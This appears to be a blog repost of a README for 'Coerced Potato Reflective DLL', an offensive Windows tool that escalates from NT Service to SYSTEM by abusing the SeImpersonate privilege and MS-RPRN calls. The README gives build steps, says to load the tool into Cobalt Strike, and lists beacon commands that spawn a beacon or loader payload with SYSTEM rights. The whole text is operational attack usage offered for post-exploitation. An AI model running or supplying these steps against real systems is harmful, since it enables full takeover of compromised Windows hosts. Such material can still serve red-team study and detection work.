Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege
Coerced Potato Reflective DLL
Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.
Heavily based on https://github.com/Prepouce/CoercedPotato
Reflective Loader from https://github.com/stephenfewer/ReflectiveDLLInjection.
Install
Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna
into CobaltStrike.
Usage
You first need to spawn the RPC listener with
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
for example
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
then you can trigger a SYSTEM call
beacon> CoercedPotato coerce
温馨提示:本文最后更新于2024年1月10日 21:25,若内容或图片失效,请在下方留言或联系博主。